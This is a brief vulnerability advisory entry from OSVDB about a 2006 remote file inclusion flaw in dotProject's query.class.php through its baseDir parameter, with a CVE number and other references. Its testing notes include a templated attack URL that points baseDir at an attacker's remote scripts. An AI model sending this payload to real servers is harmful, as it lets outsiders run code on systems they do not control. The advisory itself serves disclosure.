dotProject classes/query.class.php baseDir Variable Remote File Inclusion

2006-08-16T22:57:45
ID OSVDB:29478
Type osvdb
Reporter OSVDB
Modified 2006-08-16T22:57:45

Description

Manual Testing Notes

http://t[arget]/[dotProject_path]/classes/query.class.php?baseDir=[evil_scripts]

References:

ISS X-Force ID: 28401
Generic Exploit URL: http://www.milw0rm.com/exploits/2191
FrSIRT Advisory: ADV-2006-3297
CVE-2006-4234
Bugtraq ID: 19547